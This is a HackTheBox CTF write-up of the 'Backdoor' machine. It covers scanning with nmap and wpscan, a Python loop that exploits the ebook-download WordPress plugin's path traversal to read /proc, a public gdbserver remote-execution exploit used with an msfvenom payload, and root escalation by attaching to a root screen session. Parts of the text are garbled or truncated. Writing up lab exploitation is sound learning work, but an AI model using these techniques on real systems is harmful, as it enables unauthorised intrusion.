GitHub icon LinkedIn icon d="M6.667 4h18.667c1.467 0 2.667 1.2 2.667 2.667v18.667c0 1.467-1.2 2.667-2.667 2.667H6.667A2.675 2.675 0 0 1 4 25.334V6.667C4 5.2 5.2 4 6.667 4zm16.946 8.44c.64-.533 1.387-1.173 1.72-1.88-.547.28-1.2.453-1.92.547.667-.48 1.>
Writeup - Backdoor (HTB)
4 min read

Writeup - Backdoor (HTB)

Writeup - Backdoor (HTB)

This is a writeup for the Backdoor machine from the HackTheBox site.


First, let's start with a scan of our target with the following command:

nmap -sV

Three TCP ports are discovered:

  • 22/tcp : SSH port (OpenSSH 8.2p1)
  • 80/tcp : web server (Apache 2.4.41)
  • 1337/tcp : ?????

We have a site on port 80 and port 1337 that hosts an unknown service at the moment; let's see what the site looks like.


After inspecting the page, I notice that it is a site based on the CMS Wordpress, let's do a scan with "WPScan" to try to identify flaws:

Nothing special, let's try to do an aggressive detection of the plugins. For this I use the following command:

wpscan --url http://backdoor.htb --plugin-detection aggressive

There are two plugins: akismet and ebook-download. After some research I find that ebook-download in version 1.1 is exploitable (CVE-.

So we create a script to automate the process scan, if the page returns a message with a size greater than 82 bytes, then the process exists.

import requests

for i in range(0,1000):
    url = "http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc>
        if '1337' in resp.text:
            print("%d %s ",lg, answer.text)

After running the script, we find 2 services:

These processes are gdbserver running on our mystery port: 1337. So we can now look for exploits related to this process.

Je trouve rapidement le script suivant qui permet d'exécuter du code à distance via le service GDB :

GNU gdbserver 9.2 - Remote Command Execution (RCE)
GNU gdbserver 9.2 - Remote Command Execution (RCE).. remote exploit for Linux platform

After generating a payload with msfvenom, I run the script :

I now have a shell on the remote machine, I can get the first flag.

Privilege escalation

First I try to find the SUID files. For that I use the following command:

find / -perm -u=s -type f 2>/dev/null

There are a lot of usual commands. But among the list there is "screen".  It is a command that allows to manage several terminals at the same time. I look then if a process runs with this command:

And indeed there is a process running. But not just any process, a root shell with the options -dmS :

  • -d : detache de screen when started
  • -m : ignore the $STY environment variable, creation of a new session is enforced
  • -S : When creating a new session, this option can be used to specify a meaningful name

So we know that a screen named root has been created with the user root. If we manage to connect to the screen, we will have access to a root shell.

To connect to the detached screen we need to use the following command:

screen -x [name]/[user]

But before connecting we will have to define the variable $TERM, to do this I use the following command:

export TERM=screen

I can now connect to the root screen with the following command:

screen -x root/root

I now have access to a root shell and can retrieve the last flag.


To patch this host I think it would be necessary to perform a number of actions:

  • Update Wordpress plugin
  • Update GDB server
  • Do not run screen as root with the -m variable

Owned Backdoor from Hack The Box!
I have just owned machine Backdoor from Hack The Box